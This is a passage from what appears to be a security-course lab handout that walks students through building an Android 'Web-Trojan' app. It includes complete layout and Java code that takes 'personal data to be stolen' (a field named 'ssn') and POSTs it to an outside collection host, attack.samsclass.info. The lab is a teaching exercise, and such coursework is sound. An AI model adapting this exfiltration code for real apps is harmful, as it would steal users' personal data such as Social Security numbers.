Name the project "Web-Trojan-YOURNAME", as shown below.
Click Next.
In the "Select a form factor" page, click Next.
In the "Add an activity to Mobile" page, click Next.
In the "Select a form factor" page, click Next.
In the "Choose options for your new file" page, click Finish.
In the center pane, XML text appears, starting with "<RelativeLayout".
Highlight all that text, as shown below, and delete it.
Replace it with the text below. This makes a simple vertical layout of fields.
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:layout_width="match_parent"
android:layout_height="match_parent">
<EditText
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:id="@+id/ssn"
android:hint="Enter Personal Data to be Stolen, Without Spaces"
android:textSize="18dp" />
<Button
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:id="@+id/submit_btn"
android:text="Submit"
android:textSize="18dp" />
<TextView
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:id="@+id/response"
android:textSize="18dp" />
</LinearLayout>
At the bottom center, click the
Design tab. Then click the
Text tab.
On the right side, the new layout and text appears, as shown below.
You see code like this:
Expand the Import section and highlight it like this:
Delete it and replace it with this text, to bring in the libraries we will need.
import android.os.Bundle;
import android.app.Activity;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
import android.view.View;
import org.apache.http.client.methods.HttpPost;
import org.json.JSONException;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.client.HttpClient;
import org.apache.http.HttpResponse;
import org.apache.http.HttpEntity;
import java.io.InputStream;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import android.os.AsyncTask;
import org.json.JSONObject;
import org.apache.http.StatusLine;
import org.json.JSONArray;
import java.text.NumberFormat;
Your screen should now look like this:
Highlight all the code inside the "public class MainActivity extends ActionBarActivity {" object, as shown below:
Delete it and replace it with this text, replacing YOURNAME with your own name, without spaces.
This code sends an HTTP POST request to my server, which can display the stolen data.
String ssn="";
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Button submitButton = (Button)this.findViewById(R.id.submit_btn);
submitButton.setOnClickListener(new Button.OnClickListener(){
public void onClick(View v) {
EditText ssnName = (EditText) findViewById(R.id.ssn);
ssn=ssnName.getText().toString();
String url="http://attack.samsclass.info?TROJAN_YOURNAME="+ssn;
new ReadJSONFeed().execute(url);
}
});
}
private class ReadJSONFeed extends AsyncTask<String, String, String> {
protected void onPreExecute() {}
@Override
protected String doInBackground(String... urls) {
HttpClient httpclient = new DefaultHttpClient();
StringBuilder builder = new StringBuilder();
HttpPost httppost = new HttpPost(urls[0]);
try {
HttpResponse response = httpclient.execute(httppost);
StatusLine statusLine = response.getStatusLine();
} catch (Exception e) {
e.printStackTrace();
}
return builder.toString();
}
protected void onPostExecute(String result) {
TextView resp = (TextView) findViewById(R.id.response);
resp.setText("Stolen data will appear in 1 minute at http://attack.samsclass.info/smali.htm");
}
}
Your screen should look like this,
(with YOURNAME replaced by your own name).
In the file, find the word "ActionBarActivity", as shown below:
Change "ActionBarActivity" to "Activity", as shown below:
Add this line after the manifest opening tag, as shown below:
<uses-permission android:name="android.permission.INTERNET"/>
If error messages appear in the bottom pane, fix the errors and run the app again.
When your app works, in the "Choose a running device" screen, click OK.
The app should launch, as shown below.
Type in your name, as shown below.
Save a full-desktop image.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Save the image with the filename "YOUR NAME Proj 9xa", replacing "YOUR NAME" with your real name.
A message appears, telling you where the stolen data will appear, as shown below.
On your computer, open a Web browser and go to
http://attack.samsclass.info/smali.htm
Your name should appear, as shown below. If it does not, wait a minute and refresh the page.
Save a full-desktop image.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Save the image with the filename "YOUR NAME Proj 9xb", replacing "YOUR NAME" with your real name.